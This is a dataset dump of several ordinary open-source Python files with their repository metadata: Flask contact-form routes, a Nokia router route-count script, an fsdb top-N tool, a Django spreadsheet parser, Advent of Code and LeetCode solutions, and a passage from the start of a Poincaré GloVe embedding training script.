subject=subject,\r\n seen=False, \r\n body=body)\r\n db.session.add(contact_us)\r\n db.session.commit()\r\n elif not is_user:\r\n contact_us = ContactUs(is_user=False, \r\n seen=False, \r\n fullname=fullname,\r\n email=email, \r\n subject=subject,\r\n body=body)\r\n db.session.add(contact_us)\r\n db.session.commit()\r\n flash('Thank you for contacting us. You will hear from us once we get to your email.')\r\n return redirect(url_for('main.index'))\r\n flash(\"All the inputs must be filled.\", \"is-danger\")\r\n return redirect(url_for(\"main.index\"))\r\n if request.method == \"GET\":\r\n return render_template(\"contact_us.html\", title=title)\r\n flash(\"Something went wrong.\", \"is-warning\")\r\n return redirect(url_for(\"main.index\"))\r\n\r\n\r\n@main.route(\"/report_bug\", methods=[\"GET\", \"POST\"])\r\ndef report_bug():\r\n title = \"Lang & Code - Report Bug\"\r\n if request.method == \"POST\":\r\n subject = request.form.get(\"subject\")\r\n body = request.form.get(\"body\")\r\n fullname = request.form.get(\"fullname\")\r\n email = request.form.get(\"email\")\r\n if subject and body and email and fullname:\r\n contact_us_send_email(subject, body, email, fullname)\r\n flash('Thank you for contacting us. You will hear from us once we get to your email.')\r\n return redirect(url_for('main.index'))\r\n flash(\"All the inputs must be filled.\", \"is-danger\")\r\n return redirect(url_for(\"main.index\"))\r\n if request.method == \"GET\":\r\n return render_template(\"contact_us.html\", title=title)\r\n flash(\"Something went wrong.\", \"is-warning\")\r\n return redirect(url_for(\"main.index\"))\r\n","repo_name":"MurphyAdam/Flask-Blog","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71099634012","text":"# Modules\nimport time\nfrom pysros.management import connect\nimport re\n\n\n# Body\nif __name__ == \"__main__\":\n ## Get the timesamp in the beginning of the command\n t1 = time.ticks_ms()\n\n ## Collect the information\n connect_obj = connect() \n results = connect_obj.cli(\"show router route-table | no-more\")\n connect_obj.disconnect()\n\n ## Processing results\n is_default_route_bool = True if re.search(r'0\\.0\\.0\\.0/0', results) else False\n\n num_routes_int = 0\n for line_str in results.splitlines():\n if re.match(r'^No\\. of Routes:', line_str):\n num_routes_int = int(re.sub(r'^No\\. of Routes: (\\d)$', r'\\1', line_str))\n\n print(\"Routes in routing table: {}\\nDoes default route exist: {}\".format(num_routes_int, is_default_route_bool))\n\n ## Get the timesamp at the end\n t2 = time.ticks_ms()\n\n ## Print time\n print(\"\\nCompleted in {} ms\".format(time.ticks_diff(t2, t1))) \n","repo_name":"karneliuk-com/nokia-sros-automation","sub_path":"pysros_mdcli_get_routes_sros.py","file_name":"pysros_mdcli_get_routes_sros.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"4506772795","text":"#!/usr/bin/python3\n\n\"\"\"Find the top (bottom) N rows identified by a key and sorted by a\nvalue column. The result will be N rows with unique keys, sorted\nby the top N value columns.\n\nExamples:\n\nGiven a dataset like:\n\n #fsdb -F t one two three\n 10\ta\t42\n 20\tb\t99\n 20\ta\t50\n\nand running it as:\n\n topn -n 2 -k two -v three\n\nWill produce:\n\n #fsdb -F t one two three\n 20\tb\t99\n 20\ta\t50\n\n(ie, one row for each a and b)\n\nOr:\n\n topn -n 1 -k two -v three\n\ncreates:\n\n #fsdb -F t one two three\n 20\tb\t99\n\n\"\"\"\n\nimport sys\nimport argparse\nimport pyfsdb\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=__doc__\n )\n\n parser.add_argument(\n \"-k\", \"--key\", default=\"key\", type=str, help=\"Name of the key column to use\"\n )\n\n parser.add_argument(\n \"-v\",\n \"--value\",\n default=\"value\",\n type=str,\n help=\"Name of the value column to use when sorting\",\n )\n\n parser.add_argument(\n \"-n\", \"--max-rows\", default=20, type=int, help=\"Number of rows to return\"\n )\n\n parser.add_argument(\n \"input_file\", type=argparse.FileType(\"r\"), nargs=\"?\", default=sys.stdin, help=\"\"\n )\n\n parser.add_argument(\n \"output_file\",\n type=argparse.FileType(\"w\"),\n nargs=\"?\",\n default=sys.stdout,\n help=\"\",\n )\n\n args = parser.parse_args()\n return args\n\n\ndef maybe_add_data(data_by_key, row, key_column, value_column, min_add_value, max_rows):\n if row[key_column] in data_by_key:\n # update the existing\n data_by_key[row[key_column]] = row\n else:\n # it's a new row, append it\n data_by_key[row[key_column]] = row\n # and maybe drop an old row\n if len(data_by_key) > max_rows:\n # need to drop the lowest, which also has min_add_value\n delete_this = min(\n data_by_key, key=lambda x: float(data_by_key[x][value_column])\n )\n del data_by_key[delete_this]\n\n # calculate he new minimum\n min_key = min(\n data_by_key, key=lambda x: float(data_by_key[x][value_column])\n )\n min_add_value = float(data_by_key[min_key][value_column])\n\n return min_add_value\n\n\ndef main():\n args = parse_args()\n\n fin = pyfsdb.Fsdb(file_handle=args.input_file)\n fout = pyfsdb.Fsdb(out_file_handle=args.output_file)\n fout.column_names = fin.column_names\n\n (key_column, value_column) = fin.get_column_numbers([args.key, args.value])\n min_add_value = None\n data_by_key = {}\n data_values = []\n for row in fin:\n if (\n row[value_column] is not None\n and row[value_column] != \"-\"\n and row[value_column] != \"\"\n ):\n if min_add_value is None or min_add_value < float(row[value_column]):\n min_add_value = maybe_add_data(\n data_by_key,\n row,\n key_column,\n value_column,\n min_add_value,\n args.max_rows,\n )\n elif row[key_column] in data_by_key and float(\n data_by_key[row[key_column]][value_column]\n ) < float(row[value_column]):\n min_add_value = maybe_add_data(\n data_by_key,\n row,\n key_column,\n value_column,\n min_add_value,\n args.max_rows,\n )\n\n for key in data_by_key:\n fout.append(data_by_key[key])\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gawseed/pyfsdb","sub_path":"pyfsdb/tools/pdbtopn.py","file_name":"pdbtopn.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"20294078918","text":"import csv\nfrom dateutil import parser as date_parser\n\nimport xlrd\nfrom django.core.exceptions import ValidationError\n\n\nclass SpreadsheetParser(object):\n '''Parser for delimited or Excel files, which provides a file-like interface.\n\n You need to implement the `clean_record()` method to provide schema validation of your\n columns and rows while parsing.\n '''\n EXCEL_FILE_EXTENSIONS = ('xls', 'xlsx')\n DELIMITED_FILE_EXTENSIONS = ('csv', 'tsv')\n DELIMITER_LOOKUP = {\n 'tsv': '\\t'\n }\n\n # Arrays for primitive parsing\n booleans = integers = floats = dates = ()\n\n def __init__(self, input_file, file_type=None):\n '''Takes in the users file and validates the contents.\n '''\n self.file = input_file\n\n self.headers = []\n\n self.file_type = self.get_file_type() if file_type is None else file_type\n\n # Create the iterable for later\n self.generator = self.build_generator()\n\n def __iter__(self):\n '''Provides iteration over the rows of the file.\n '''\n return self.generator\n\n def get_file_type(self):\n '''What is the extension of the file provided.\n '''\n return self.file.name.split('.')[-1]\n\n def build_generator(self):\n '''Returns an iterable-generator for the file.\n '''\n parser = None\n if self.file_type in self.EXCEL_FILE_EXTENSIONS:\n parser = self.excel_parser\n elif self.file_type in self.DELIMITED_FILE_EXTENSIONS:\n parser = self.delimited_parser\n\n # If we didn't find a parser, complain about the file type we were given\n if parser is None:\n raise ValidationError('Invalid file extension `%s` provided' % self.file_type)\n\n # Invoke the parser to get results\n return parser()\n\n def delimited_parser(self):\n '''Parses delimited file with a given delimiter.\n '''\n delimiter = self.DELIMITER_LOOKUP.get(self.file_type, ',')\n reader = csv.DictReader(self.file, delimiter=delimiter)\n for record in reader:\n yield self.clean_record(record)\n\n def excel_parser(self):\n '''Parses Excel file into rows mimicing `csv.DictReader`.\n '''\n workbook = xlrd.open_workbook(file_contents=self.file.read(), on_demand=True)\n worksheet = workbook.sheet_by_index(0)\n\n # Extract the headers from the sheet\n for col in range(worksheet.ncols):\n self.headers.append(worksheet.cell_value(0, col))\n\n # Validate the individual rows now\n for row in range(1, worksheet.nrows):\n record = {}\n for column in range(worksheet.ncols):\n cell = worksheet.cell(row, column)\n value = cell.value\n if cell.ctype == xlrd.XL_CELL_NUMBER:\n value = int(cell.value)\n record[self.headers[column]] = str(value)\n\n # Validate and yield the record\n yield self.clean_record(record)\n\n def clean_record(self, record):\n '''Raises a `ValidationError` if the record doesn't match the expected format.\n\n Natively parses primitive types from class defined arrays.\n '''\n try:\n # Booleans\n for field in self.booleans:\n value = record[field].title()\n if value == 'True':\n record[field] = True\n elif value == 'False':\n record[field] = False\n else:\n record[field] = None\n\n # Integers\n for field in self.integers:\n try:\n record[field] = int(record[field])\n except ValueError:\n record[field] = None\n\n # Floats\n for field in self.floats:\n try:\n record[field] = float(record[field])\n except ValueError:\n record[field] = None\n\n # Datetimes\n for field in self.dates:\n record[field] = date_parser.parse(record[field])\n except (TypeError, ValueError):\n raise ValidationError('Unable to parse `%s` for field `%s`' % (record[field], field))\n\n return record\n","repo_name":"brian-lai/django-docker","sub_path":"core/utils/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29965344548","text":"import unittest\n\n\ndef read_puzzle_input(filename):\n with open(filename, 'r') as f:\n data = f.read()\n return data\n\n\ndef parse_data(data: str) -> list[(str, str)]:\n rval: list[(str, str)] = []\n for line in data.splitlines():\n h = len(line) // 2\n rval.append((line[0:h], line[h:]))\n return rval\n\n\ndef find_common_letter(s1: str, s2: str) -> str:\n for c1 in s1:\n for c2 in s2:\n if c1 == c2:\n return c1\n raise ValueError(f'No duplicate found in {s1} and {s2}')\n\n\ndef find_common_letter_for_three(s1: str, s2: str, s3: str):\n for c1 in s1:\n for c2 in s2:\n if c1 == c2 and c1 in s3:\n return c1\n raise ValueError(f'{s1}, {s2} and {s3} have no common char')\n\n\ndef lookup_type_rank(type: str) -> int:\n if type >= 'a' and type <= 'z':\n return ord(type) - ord('a') + 1\n if type >= 'A' and type <= 'Z':\n return ord(type) - ord('A') + 27\n raise ValueError(f'Expected a letter. Got {type} instead.')\n\n\ndef tally_ranks(rucksacks: (str, str)) -> int:\n tally = 0\n for rucksack in rucksacks:\n c = find_common_letter(rucksack[0], rucksack[1])\n tally += lookup_type_rank(c)\n return tally\n\n\ndef part_one(filename):\n data = read_puzzle_input(filename)\n rucksacks = parse_data(data)\n tally = tally_ranks(rucksacks)\n return tally\n\n\ndef part_two(filename):\n data = read_puzzle_input(filename)\n rucksacks = parse_data(data)\n tally = 0\n for i in range(0, len(rucksacks), 3):\n common_letter = find_common_letter_for_three(\n rucksacks[i][0] + rucksacks[i][1],\n rucksacks[i + 1][0] + rucksacks[i + 1][1],\n rucksacks[i + 2][0] + rucksacks[i + 2][1])\n tally += lookup_type_rank(common_letter)\n\n return tally\n\nfilename = \"Day_03_input.txt\"\nprint(f'Answer part one: {part_one(filename)}')\nprint(f'Answer part two: {part_two(filename)}')\n\n\nclass Test(unittest.TestCase):\n def test_part_two(self):\n self.assertEqual(70, part_two('Day_03_short_input.txt'))\n\n def test_parse_data(self):\n data = read_puzzle_input('Day_03_short_input.txt')\n rucksacks = parse_data(data)\n self.assertEqual('vJrwpWtwJgWr', rucksacks[0][0])\n self.assertEqual('hcsFMMfFFhFp', rucksacks[0][1])\n self.assertEqual('CrZsJsPPZsGz', rucksacks[5][0])\n self.assertEqual('wwsLwLmpwMDw', rucksacks[5][1])\n\n def test_find_common_letter(self):\n data = read_puzzle_input('Day_03_short_input.txt')\n rucksacks = parse_data(data)\n self.assertEqual('p', find_common_letter(rucksacks[0][0], rucksacks[0][1]))\n self.assertEqual('L', find_common_letter(rucksacks[1][0], rucksacks[1][1]))\n self.assertEqual('P', find_common_letter(rucksacks[2][0], rucksacks[2][1]))\n self.assertEqual('v', find_common_letter(rucksacks[3][0], rucksacks[3][1]))\n self.assertEqual('t', find_common_letter(rucksacks[4][0], rucksacks[4][1]))\n self.assertEqual('s', find_common_letter(rucksacks[5][0], rucksacks[5][1]))\n\n def test_lookup_type_rank(self):\n self.assertEqual(1, lookup_type_rank('a'))\n self.assertEqual(26, lookup_type_rank('z'))\n self.assertEqual(27, lookup_type_rank('A'))\n self.assertEqual(52, lookup_type_rank('Z'))\n\n def test_tally_ranks(self):\n data = read_puzzle_input('Day_03_short_input.txt')\n rucksacks = parse_data(data)\n self.assertEqual(157, tally_ranks(rucksacks))\n\n def test_find_common_letter_for_three(self):\n c = find_common_letter_for_three(\n 'vJrwpWtwJgWrhcsFMMfFFhFp',\n 'jqHRNqRjqzjGDLGLrsFMfFZSrLrFZsSL',\n 'PmmdzqPrVvPwwTWBwg')\n self.assertEqual('r', c)\n c = find_common_letter_for_three(\n 'wMqvLMZHhHMvwLHjbvcjnnSBnvTQFn',\n 'ttgJtRGJQctTZtZT',\n 'CrZsJsPPZsGzwwsLwLmpwMDw')\n self.assertEqual('Z', c)\n","repo_name":"rslinford/Advent_of_Code_2022","sub_path":"Day_03.py","file_name":"Day_03.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42549003064","text":"class Solution:\n def sort_list(self, list1, list2):\n indices = [i for i, x in sorted(enumerate(list2), key=lambda x: x[1])]\n arr = [list1[i] for i in indices]\n return arr\n\n def sortJumbled(self, mapping, nums):\n\n numberDict = {}\n for item in range(len(mapping)):\n numberDict[item] = mapping[item]\n changed_num = \"\"\n stack = []\n\n for item in nums:\n left, right = 0, len(str(item))\n while left < right:\n item = str(item)\n changed_num += str(numberDict[int(item[left])])\n left += 1\n stack.append(int(changed_num))\n changed_num = \"\"\n\n res = self.sort_list(nums, stack)\n return res\n\n\ns = Solution()\nprint(s.sortJumbled(mapping=[8, 9, 4, 0, 2, 1, 3, 5, 7, 6], nums=[991, 338, 38]))\nprint(s.sortJumbled(mapping=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], nums=[789, 456, 123]))\n","repo_name":"bipsec/Leet-Code","sub_path":"sort_the_jumbled_numbers.py","file_name":"sort_the_jumbled_numbers.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38637788791","text":"#!/usr/local/bin/python3\n\nimport argparse\nimport gensim\nfrom gensim.models.callbacks import WordEmbCheckpointSaver\nfrom glove_code.src.glove import Glove, NNConfig, InitializationConfig\nfrom util_scripts.get_model_eval_and_stats import *\nimport logging\nfrom nltk.corpus import brown\nimport numpy as np\nfrom numpy import float32 as REAL\nfrom numpy.linalg import norm\nimport os\nimport socket\nimport time\n\nMODEL_FILENAME_PATTERN = \"models/glove/{}/glove_ep{}_size{}_lr{}_vocab{}_{}\"\nINITIALIZATION_MODEL_FILENAME = {\n \"100D\": \"data/pretrained_models/glove_pretrained_100d_levy_vocab50k_cosh-dist-sq_bias\",\n \"vanilla_100D\": \"data/pretrained_models/glove_vanilla_pretrained_100d_levy_vocab50k_bias\",\n}\nif socket.gethostname() in [\"armin\", \"grinder\", \"mark\", \"youagain\", \"dalabgpu\"]: # DALAB machines\n INITIALIZATION_MODEL_FILENAME = {\n \"100D\": \"/media/hofmann-scratch/Octavian/alext/data/pretrained_models/glove_pretrained_100d_levy_vocab50k_cosh-dist-sq_bias\",\n \"vanilla_100D\": \"/media/hofmann-scratch/Octavian/alext/data/pretrained_models/glove_vanilla_pretrained_100d_levy_vocab50k_bias\",\n }\nelif \"lo-\" in socket.gethostname(): # Leonhard nodes\n INITIALIZATION_MODEL_FILENAME = {\n \"100D\": \"/cluster/scratch/tifreaa/data/pretrained_models/glove_pretrained_100d_levy_vocab50k_cosh-dist-sq_bias\",\n \"50x2D\": \"/cluster/scratch/tifreaa/data/pretrained_models/glove_pretrained_50x2D_ep50_levy_vocab50k_cosh-dist-sq_bias\",\n \"vanilla_100D\": \"/cluster/scratch/tifreaa/data/pretrained_models/glove_vanilla_pretrained_100d_levy_vocab50k_bias\",\n }\n\n\nSEM_GOOGLE_SIZE = 8869\nSYN_GOOGLE_SIZE = 10675\nGOOGLE_SIZE = 19544\nMSR_SIZE = 8000\n\n# IMPORTANT!!!!!!!!!!! First one for each embedding type should be the default.\nSUPPORTED_OPTIMIZERS = {\n \"vanilla\": [\"adagrad\"],\n \"euclid\": [\"adagrad\"],\n \"poincare\": [\"radagrad\", \"fullrsgd\", \"wfullrsgd\", \"ramsgrad\"],\n \"mix-poincare\": [\"mixradagrad\"],\n}\n\n# IMPORTANT!! First one is the default.\n# This refers to the distance function used in during training.\nSUPPORTED_DIST_FUNCTIONS = {\n \"vanilla\": [\"dist\", \"nn\"],\n \"euclid\": [\"dist-sq\", \"dist\"],\n \"poincare\": [\"dist-sq\", \"dist\", \"cosh-dist\", \"cosh-dist-sq\", \"cosh-dist-pow-*\", \"log-dist-sq\"],\n \"mix-poincare\": [\"dist\", \"dist-sq\", \"cosh-dist-sq\"],\n}\n\nSUPPORTED_COOCC_FUNCTIONS = [\"log\"]\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef precision(eval_result):\n return len(eval_result['correct']) / (len(eval_result['correct']) + len(eval_result['incorrect']))\n\n\ndef compute_poincare_aggregate(model, config):\n \"\"\"\n Precompute the average between the target and the context vector, for Poincare embeddings.\n We take as average the mid point between w and c on the geodesic that connects the 2 points\n (see page 89 in Ungar book).\n \"\"\"\n if config[\"similarity\"] == \"poincare\":\n print(\"precomputing aggregated vectors w+c for Poincare embeddings\")\n gamma_w_sq = 1 / (1 - np.sum(model.wv.vectors * model.wv.vectors, axis=1))\n gamma_c_sq = 1 / (1 - np.sum(model.trainables.syn1neg * model.trainables.syn1neg, axis=1))\n denominator = gamma_w_sq + gamma_c_sq - 1\n agg = (model.wv.vectors * (gamma_w_sq / denominator)[:, None] +\n model.trainables.syn1neg * (gamma_c_sq / denominator)[:, None])\n\n model.wv.vectors = model.wv.moebius_mul_mat(agg, 0.5)\n elif config[\"similarity\"] == \"mix-poincare\":\n print(\"precomputing aggregated vectors w+c for MIX-Poincare embeddings\")\n small_emb_size = int(model.vector_size / model.num_embs)\n for i in range(model.num_embs):\n start = i * small_emb_size\n end = (i + 1) * small_emb_size\n indexes = range(start, end)\n gamma_w_sq = 1 / (1 - np.sum(model.wv.vectors[:, indexes] * model.wv.vectors[:, indexes], axis=1))\n gamma_c_sq = 1 / (1 - np.sum(model.trainables.syn1neg[:, indexes] * model.trainables.syn1neg[:, indexes], axis=1))\n denominator = gamma_w_sq + gamma_c_sq - 1\n agg = (model.wv.vectors[:, indexes] * (gamma_w_sq / denominator)[:, None] +\n model.trainables.syn1neg[:, indexes] * (gamma_c_sq / denominator)[:, None])\n\n model.wv.vectors[:, indexes] = model.wv.moebius_mul_mat(agg, 0.5)\n else:\n print(\"precomputing aggregated vectors w+c for Euclidean embeddings\")\n model.wv.vectors = model.wv.vectors + model.trainables.syn1neg\n\n\ndef split_filename(basename):\n info = basename.split('_')\n return info\n\n\n# Extract information about a model from the filename.\ndef parse_model_filename(model_filename):\n info_dict = {}\n basename = os.path.basename(model_filename)\n info = split_filename(basename)\n\n if \"pairs\" in basename:\n return None, basename\n\n info_dict[\"epochs\"] = int(info[1][2:])\n info_dict[\"emb_size\"] = int(info[2][4:])\n info_dict[\"lr\"] = float(info[3][2:])\n info_dict[\"restrict_vocab\"] = int(info[4][5:])\n info_dict[\"similarity\"] = info[5]\n info_dict[\"with_bias\"] = True if \"_bias\" in basename else False\n info_dict[\"init_near_border\"] = True if \"_border-init\" in basename else False\n\n for s in info:\n if \"OPT\" in s:\n info_dict[\"optimizer\"] = s[3:]\n elif \"COOCCFUNC\" in s:\n info_dict[\"coocc_func\"] = s[9:]\n elif \"DISTFUNC\" in s:\n info_dict[\"dist_func\"] = s[8:]\n elif \"scale\" in s:\n info_dict[\"use_scaling\"] = True\n elif \"NUMEMBS\" in s:\n info_dict[\"num_embs\"] = int(s[7:])\n elif \"logprobs\" in s:\n info_dict[\"use_log_probs\"] = True\n\n if \"optimizer\" not in info_dict:\n info_dict[\"optimizer\"] = SUPPORTED_OPTIMIZERS[info_dict[\"similarity\"]][0]\n if \"coocc_func\" not in info_dict:\n info_dict[\"coocc_func\"] = SUPPORTED_COOCC_FUNCTIONS[0]\n if \"dist_func\" not in info_dict:\n info_dict[\"dist_func\"] = SUPPORTED_DIST_FUNCTIONS[info_dict[\"similarity\"]][0]\n if \"use_scaling\" not in info_dict:\n info_dict[\"use_scaling\"] = False\n if \"use_log_probs\" not in info_dict:\n info_dict[\"use_log_probs\"] = False\n\n return info_dict, basename\n\n\n# Class that produces output both to stdout and to an output file. Used during evaluation.\nclass Logger:\n def __init__(self, fout=None):\n self.fout = fout\n\n def log(self, log_str='', end='\\n'):\n logging.info(log_str)\n if self.fout:\n if end == '':\n self.fout.write(log_str)\n else:\n self.fout.write(log_str + end)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', dest='train', action='store_true',\n help='Train a new model.')\n parser.add_argument('--eval', dest='train', action='store_false',\n help='Eval an existing model.')\n parser.add_argument('--use_our_format', dest='use_glove_format', action='store_false',\n help='Use our format for reading the vocabulary and the co-occ matrix, instead of the format '\n 'from the original GloVe code.')\n parser.add_argument('--coocc_file', type=str,\n help='Filename which contains the coocc matrix in text format.')\n parser.add_argument('--vocab_file', type=str,\n help='Filename which contains the vocabulary.')\n parser.add_argument('--root', type=str,\n default='~/Documents/Master/Thesis',\n help='Path to the root folder that contains msc_tifreaa, data etc.')\n parser.add_argument('--euclid', type=int, default=0,\n help='Whether it uses Euclidean distance to train the embeddings instead of dot product.')\n parser.add_argument('--poincare', type=int, default=0, help='Whether it uses Poincare embeddings or not.')\n parser.add_argument('--dist_func', type=str, default=\"\",\n help='Distance function used by Poincare model during training.')\n parser.add_argument('--num_embs', type=int, default=0,\n help='The number of small-dimensional planes that will come into the carthesian product of'\n 'manifolds')\n parser.add_argument('--mix', dest='mix', action='store_true',\n help='If true, use a carthesian product of small-dimensional embeddings.')\n parser.add_argument('--nn_config', type=str, default=\"\",\n help='Configuration of the NN used during training.')\n parser.add_argument('--coocc_func', type=str, default=\"\",\n help='Co-occurence function used during training.')\n parser.add_argument('--use_scaling', dest='use_scaling', action='store_true',\n help='Use trainable scaling factor for Poincare GloVe')\n parser.add_argument('--epochs', type=int, default=5, help='Number of epochs')\n parser.add_argument('--restrict_vocab', type=int, default=400000,\n help='Only use the `restrict_vocab` most frequent words')\n parser.add_argument('--size', type=int, default=100, help='Embedding size')\n parser.add_argument('--optimizer', type=str, default='', help='What optimizer to use.')\n parser.add_argument('--lr', type=float, default=0.05, help='Learning rate')\n parser.add_argument('--bias', dest='with_bias', action='store_true', help='Use a model with biases.')\n parser.add_argument('--workers', type=int, default=3, help='Number of concurrent workers.')\n parser.add_argument('--chunksize', type=int, default=1000,\n help='Number of `prange` iterations that each thread processes at a time')\n parser.add_argument('--model_filename', type=str, default='', help='Path to saved model.')\n parser.add_argument('--train_log_filename', type=str, default='', help='Path to the training log.')\n parser.add_argument('--cosadd', dest='cosadd', action='store_true',\n help='Use 3COSADD when evaluating word analogy.')\n parser.add_argument('--cosmul', dest='cosmul', action='store_true',\n help='Use 3COSMUL when evaluating word analogy.')\n parser.add_argument('--distadd', dest='distadd', action='store_true',\n help='Use 3DISTADD when evaluating word analogy.')\n parser.add_argument('--hypcosadd', dest='hypcosadd', action='store_true',\n help='Use 3COSADD with gyrocosine when evaluating word analogy.')\n parser.add_argument('--agg_eval', dest='agg_eval', action='store_true',\n help='Use w+c during evaluation, instead of just w. Only works for Poincare embeddings.')\n parser.add_argument('--ctx_eval', dest='ctx_eval', action='store_true',\n help='Use c during evaluation, instead of w.')\n parser.add_argument('--cosine_eval', dest='cosine_eval', action='store_true',\n help='Use cosine distance during evaluation, instead of the Poincare distance.')\n parser.add_argument('--ckpt_emb', dest='ckpt_emb', action='store_true',\n help='Store checkpoints during training with the value of the embedding for certain words')\n parser.add_argument('--init_near_border', dest='init_near_border', action='store_true',\n help='If set, initialize embeddings near the Poincare ball border, instead of near the origin.')\n parser.add_argument('--init_pretrained', dest='init_pretrained', action='store_true',\n help='If set, initialize embeddings from pretrained model.')\n parser.add_argument('--use_log_probs', dest='use_log_probs', action='store_true',\n help='If set, use log-probabilities instead of log-counts during training GloVe.')\n parser.add_argument('--debug', dest='is_debug', action='store_true',\n help='Run model in debug mode')\n parser.set_defaults(train=False, use_glove_format=True, mix=False, with_bias=False, use_scaling=False,\n cosadd=False, cosmul=False, distadd=False, hypcosadd=False, cosine_eval=False,\n agg_eval=False, ctx_eval=False, shift_origin=False, cosine_dist=False, ckpt_emb=False,\n init_near_border=False, init_pretrained=False, use_log_probs=False, is_debug=False)\n args = parser.parse_args()\n\n if args.size > 4 and args.size % 4 != 0:\n raise RuntimeError(\"Choose an embedding size that is a multiple of 4 (it speeds up computation)\")\n\n model = None\n if args.train:\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n callbacks = []\n\n emb_type = None\n if args.poincare == 1:\n emb_type = 'poincare'\n elif args.euclid == 1:\n emb_type = 'euclid'\n else:\n emb_type = 'vanilla'\n\n if args.mix:\n emb_type = \"mix-\" + emb_type\n\n coocc_func = args.coocc_func\n if coocc_func == \"\":\n coocc_func = SUPPORTED_COOCC_FUNCTIONS[0] # Set the default\n else:\n if coocc_func not in SUPPORTED_COOCC_FUNCTIONS:\n raise RuntimeError(\"Unsupported co-occurrence function {}\".format(coocc_func))\n\n cosh_dist_pow = 0\n dist_func = args.dist_func\n if emb_type == \"poincare\" or emb_type == \"mix-poincare\" or emb_type == \"euclid\":\n if dist_func == \"\":\n dist_func = SUPPORTED_DIST_FUNCTIONS[emb_type][0] # Set the default\n elif \"cosh-dist-pow\" in dist_func:\n cosh_dist_pow = int(dist_func.rsplit(\"-\", 1)[1])\n else:\n if dist_func not in SUPPORTED_DIST_FUNCTIONS[emb_type]:\n raise RuntimeError(\"Unsupported distance function {} for emb type {}\".format(dist_func, emb_type))\n num_embs = 0\n if \"mix-\" in emb_type:\n if args.num_embs == 0:\n raise RuntimeError(\"Invalid number of small embeddings.\")\n num_embs = args.num_embs\n\n if args.num_embs != 0 and \"mix-\" not in emb_type:\n raise RuntimeError(\"num_embs is not supported for this embedding type: {}\".format(emb_type))\n\n nn_config = None\n if dist_func == \"nn\":\n if args.nn_config == \"\":\n raise RuntimeError(\"No NN configuration provided!\")\n nn_config = NNConfig(args.nn_config)\n\n optimizer = args.optimizer\n if optimizer == \"\":\n optimizer = SUPPORTED_OPTIMIZERS[emb_type][0] # Set the default\n else:\n if optimizer not in SUPPORTED_OPTIMIZERS[emb_type]:\n raise RuntimeError(\"Unsupported optimizer {} for embedding type {}\".format(optimizer, emb_type))\n\n filename = MODEL_FILENAME_PATTERN.format(\n \"glove_baseline\" if emb_type == \"vanilla\" else \"geometric_emb\",\n args.epochs, args.size, str(args.lr), args.restrict_vocab, emb_type)\n filename = filename + \"_OPT\" + optimizer\n filename = filename + \"_COOCCFUNC\" + coocc_func\n if emb_type != \"vanilla\":\n filename = filename + \"_DISTFUNC\" + dist_func\n elif emb_type == \"vanilla\" and dist_func == \"nn\":\n filename = filename + \"_DISTFUNCnn\"\n if dist_func == \"nn\":\n filename = filename + \"_NN\" + args.nn_config\n if num_embs:\n filename = filename + \"_NUMEMBS\" + str(num_embs)\n if args.with_bias:\n filename = filename + \"_bias\"\n if args.use_scaling:\n if emb_type != \"poincare\" and emb_type != \"mix-poincare\":\n raise RuntimeError(\"Scaling is only supported for Poincare GloVe embeddings.\")\n filename = filename + \"_scale\"\n if args.use_log_probs:\n filename = filename + \"_logprobs\"\n if args.init_near_border:\n filename = filename + \"_border-init\"\n initialization_config = None\n if args.init_pretrained:\n if emb_type == \"poincare\" and args.size == 100:\n pretrained_model_filename = INITIALIZATION_MODEL_FILENAME[\"100D\"]\n elif emb_type == \"mix-poincare\" and args.size == 100 and num_embs == 50:\n pretrained_model_filename = INITIALIZATION_MODEL_FILENAME[\"50x2D\"]\n elif emb_type == \"vanilla\" and args.size == 100:\n pretrained_model_filename = INITIALIZATION_MODEL_FILENAME[\"vanilla_100D\"]\n else:\n raise RuntimeError(\"Undefined pretrained embedding for this setting.\")\n print(\"Initializing embeddings from pretrained model\", pretrained_model_filename)\n initialization_config = InitializationConfig(\n pretrained_model_filename=os.path.join(args.root, pretrained_model_filename)\n )\n filename = filename + \"_INITpretrained\"\n model_filename = os.path.join(args.root, filename)\n\n ckpt_word_list = None\n if args.ckpt_emb:\n with open(os.path.join(args.root, \"msc_tifreaa/data/google_analogy_vocab.txt\"), \"r\") as f:\n ckpt_word_list = [word.strip() for word in f.readlines()]\n ckpt_filename = \"word_emb_checkpoints/emb_ckpt_\" + os.path.basename(model_filename)\n ckpt_filename = os.path.join(args.root, ckpt_filename)\n callbacks.append(WordEmbCheckpointSaver(ckpt_filename=ckpt_filename))\n\n print(\"[Training] Train new model {} using {}\".format(model_filename, optimizer.upper()), end=\"\")\n if emb_type == \"poincare\":\n print(\" and distance function {}\".format(dist_func.upper()))\n else:\n print(\"\")\n\n model = Glove(\n use_glove_format=args.use_glove_format,\n coocc_file=args.coocc_file,\n vocab_file=args.vocab_file,\n restrict_vocab=args.restrict_vocab,\n num_workers=args.workers,\n chunksize=args.chunksize,\n epochs=args.epochs,\n euclid=args.euclid,\n poincare=args.poincare,\n with_bias=args.with_bias,\n use_log_probs=args.use_log_probs,\n dist_func=dist_func,\n cosh_dist_pow=cosh_dist_pow,\n num_embs=num_embs,\n nn_config=nn_config,\n coocc_func=coocc_func,\n 